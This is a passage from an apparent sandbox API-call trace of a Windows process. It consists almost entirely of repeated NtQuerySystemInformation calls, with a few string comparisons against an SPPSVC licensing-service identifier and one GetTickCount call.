SystemInformation=0xc751f7f220, Length=0x28, ResultLength=0x0) [0241.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f290, Length=0x28, ResultLength=0x0) [0241.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3f0, Length=0x38, ResultLength=0x0) [0241.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f310, Length=0x28, ResultLength=0x0) [0241.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f310, Length=0x28, ResultLength=0x0) [0241.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3f0, Length=0x38, ResultLength=0x0) [0241.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f270, Length=0x20, ResultLength=0x0) [0241.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1f0, Length=0x20, ResultLength=0x0) [0241.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1f0, Length=0x20, ResultLength=0x0) [0241.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1f0, Length=0x20, ResultLength=0x0) [0241.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3f0, Length=0x38, ResultLength=0x0) [0241.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f270, Length=0x20, ResultLength=0x0) [0241.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x20, ResultLength=0x0) [0241.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x20, ResultLength=0x0) [0241.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4c0, Length=0x50, ResultLength=0x0) [0241.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f440, Length=0x28, ResultLength=0x0) [0241.855] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0241.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4c0, Length=0x50, ResultLength=0x0) [0241.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4c0, Length=0x50, ResultLength=0x0) [0241.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4c0, Length=0x50, ResultLength=0x0) [0241.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3f0, Length=0x38, ResultLength=0x0) [0241.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f220, Length=0x28, ResultLength=0x0) [0241.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f220, Length=0x28, ResultLength=0x0) [0241.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f220, Length=0x28, ResultLength=0x0) [0241.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f290, Length=0x28, ResultLength=0x0) [0241.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3f0, Length=0x38, ResultLength=0x0) [0241.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f310, Length=0x28, ResultLength=0x0) [0241.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f310, Length=0x28, ResultLength=0x0) [0241.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3f0, Length=0x38, ResultLength=0x0) [0241.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f270, Length=0x20, ResultLength=0x0) [0241.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1f0, Length=0x20, ResultLength=0x0) [0241.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1f0, Length=0x20, ResultLength=0x0) [0241.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1f0, Length=0x20, ResultLength=0x0) [0241.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3f0, Length=0x38, ResultLength=0x0) [0241.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f270, Length=0x20, ResultLength=0x0) [0241.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x20, ResultLength=0x0) [0241.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x20, ResultLength=0x0) [0241.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f510, Length=0x58, ResultLength=0x0) [0241.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f480, Length=0x28, ResultLength=0x0) [0241.864] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0241.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f510, Length=0x58, ResultLength=0x0) [0241.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f510, Length=0x58, ResultLength=0x0) [0241.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f510, Length=0x58, ResultLength=0x0) [0241.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3f0, Length=0x38, ResultLength=0x0) [0241.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f230, Length=0x28, ResultLength=0x0) [0241.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f230, Length=0x28, ResultLength=0x0) [0241.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f230, Length=0x28, ResultLength=0x0) [0241.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x28, ResultLength=0x0) [0241.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3f0, Length=0x38, ResultLength=0x0) [0241.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3f0, Length=0x38, ResultLength=0x0) [0241.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f320, Length=0x28, ResultLength=0x0) [0241.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f320, Length=0x28, ResultLength=0x0) [0241.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3f0, Length=0x38, ResultLength=0x0) [0241.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3f0, Length=0x38, ResultLength=0x0) [0241.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f190, Length=0x20, ResultLength=0x0) [0241.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f110, Length=0x20, ResultLength=0x0) [0241.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f110, Length=0x20, ResultLength=0x0) [0241.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f110, Length=0x20, ResultLength=0x0) [0241.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f360, Length=0x20, ResultLength=0x0) [0241.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3f0, Length=0x38, ResultLength=0x0) [0241.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f280, Length=0x20, ResultLength=0x0) [0241.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x20, ResultLength=0x0) [0241.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x20, ResultLength=0x0) [0241.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x20, ResultLength=0x0) [0241.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3f0, Length=0x38, ResultLength=0x0) [0241.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f280, Length=0x20, ResultLength=0x0) [0241.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x20, ResultLength=0x0) [0241.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x20, ResultLength=0x0) [0241.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x20, ResultLength=0x0) [0241.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3f0, Length=0x38, ResultLength=0x0) [0241.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f280, Length=0x20, ResultLength=0x0) [0241.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f210, Length=0x20, ResultLength=0x0) [0241.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f210, Length=0x20, ResultLength=0x0) [0241.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f510, Length=0x58, ResultLength=0x0) [0241.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f450, Length=0x20, ResultLength=0x0) [0241.877] GetTickCount () returned 0x117cf49 [0241.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f308, Length=0x58, ResultLength=0x0) [0241.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f220, Length=0x38, ResultLength=0x0) [0241.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f050, Length=0x28, ResultLength=0x0) [0241.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f050, Length=0x28, ResultLength=0x0) [0241.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f050, Length=0x28, ResultLength=0x0) [0241.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f050, Length=0x28, ResultLength=0x0) [0241.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0c0, Length=0x28, ResultLength=0x0) [0241.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f220, Length=0x38, ResultLength=0x0) [0241.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f140, Length=0x28, ResultLength=0x0) [0241.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f140, Length=0x28, ResultLength=0x0) [0241.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f220, Length=0x38, ResultLength=0x0) [0241.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0a0, Length=0x20, ResultLength=0x0) [0241.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f020, Length=0x20, ResultLength=0x0) [0241.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f020, Length=0x20, ResultLength=0x0) [0241.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f020, Length=0x20, ResultLength=0x0) [0241.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 